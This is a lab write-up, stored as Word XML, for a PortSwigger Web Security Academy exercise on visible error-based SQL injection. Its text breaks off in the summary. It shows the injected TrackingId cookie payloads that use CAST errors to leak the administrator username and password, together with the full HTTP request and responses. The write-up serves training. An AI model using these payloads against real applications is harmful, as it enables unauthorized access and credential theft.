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56A0"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">PortSwigger Lab Write-Up</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Visible Error-Based SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A56A0" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="0" w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Author: Neelesh Pandey  |  Platform: PortSwigger Web Security Academy  |  Difficulty: Practitioner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Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="68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SQL Injection / Visible Error-Based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 Technique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CAST(value AS int) — type error leaks data in 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Password Extracted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x1xwhtmp9eee4virigad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Requests Needed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manual requests in Burp Repeater</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A56A0" w:sz="8" w:space="2"/>
        </w:pBdr>
        <w:spacing w:before="280" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A56A0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1. OVERVIEW</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">This lab demonstrates visible error-based SQL injection where the database error message itself leaks sensitive data directly in the HTTP response. Unlike blind SQLi which requires hundreds of requests to infer data one bit at a time, this technique extracts complete values in a single request.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Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Data Channel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Speed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Blind error-based (Oracle)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 500 vs 200 — infer one bit at a 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Slow — 720+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Visible error-based (PostgreSQL)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value in error message body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 — 1 request per value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A56A0" w:sz="8" w:space="2"/>
        </w:pBdr>
        <w:spacing w:before="280" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A56A0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2. CONFIRMING THE INJECTION POINT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="180" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1 Trigger Verbose Error</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Appended a single quote to the TrackingId cookie:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">TrackingId=ogAZZfxtOKUELbuJ'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Response: HTTP 500 with full SQL query disclosed in error message — confirming injection and revealing the query structure. The value is inside a single-quoted string.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="180" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2 Comment Out the Rest</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">TrackingId=ogAZZfxtOKUELbuJ'--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Response: HTTP 200. The -- comment terminates the query, fixing the syntax error.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A56A0" w:sz="8" w:space="2"/>
        </w:pBdr>
        <w:spacing w:before="280" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A56A0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3. BUILDING THE CAST EXTRACTION PAYLOAD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="180" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1 Test CAST Subquery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">TrackingId=ogAZZfxtOKUELbuJ' AND CAST((SELECT 1) AS int)--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Response: Error — AND condition must be a boolean expression, not an integer value.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="180" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2 Fix as Boolean Comparison</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">TrackingId=ogAZZfxtOKUELbuJ' AND 1=CAST((SELECT 1) AS int)--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Response: HTTP 200 — valid. 1=CAST(...) makes it a boolean comparison. This is the base payload structure for all subsequent extraction.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="180" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Why CAST Leaks Data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">When PostgreSQL tries to cast a string to an integer and fails, the error message includes the actual string value:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">ERROR: invalid input syntax for type integer: "administrator"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">This turns PostgreSQL's type system into a data exfiltration channel — no binary search, no side channels needed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A56A0" w:sz="8" w:space="2"/>
        </w:pBdr>
        <w:spacing w:before="280" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A56A0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4. EXTRACTING USERNAME</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="180" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1 Query Users Table</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">TrackingId=ogAZZfxtOKUELbuJ' AND 1=CAST((SELECT username FROM users) AS int)--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Response: Error — query truncated due to character limit. The -- comment not included, breaking syntax.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="180" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2 Clear TrackingId to Free Characters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">TrackingId=' AND 1=CAST((SELECT username FROM users) AS int)--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Response: New error — subquery returned more than one row.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="180" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3 Limit to One Row</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">TrackingId=' AND 1=CAST((SELECT username FROM users LIMIT 1) AS int)--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Response — username leaked in error:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">ERROR: invalid input syntax for type integer: "administrator"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">First user confirmed as administrator.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A56A0" w:sz="8" w:space="2"/>
        </w:pBdr>
        <w:spacing w:before="280" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A56A0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5. EXTRACTING THE PASSWORD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="180" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1 Final Payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">TrackingId=' AND 1=CAST((SELECT password FROM users LIMIT 1) AS int)--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="180" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">5.2 Full HTTP Request</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">GET / HTTP/2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Host: 0a3400180472936780e612a200e70018.web-security-academy.net</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie: TrackingId=' AND 1=CAST((SELECT password From users LIMIT 1) AS INT)--;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        session=3HG4W8XssviE5wVlCbIH7sLJBZsD65x1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="180" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">5.3 Response — Password in Error</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP/2 500 Internal Server Error</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">ERROR: invalid input syntax for type integer: "x1xwhtmp9eee4virigad"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Password extracted: x1xwhtmp9eee4virigad</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Login: administrator / x1xwhtmp9eee4virigad — lab solved.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A56A0" w:sz="8" w:space="2"/>
        </w:pBdr>
        <w:spacing w:before="280" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A56A0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">6. ATTACK FLOW SUMMARY</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">TrackingId='  →  Verbose error reveals full SQL query</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">       ↓</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
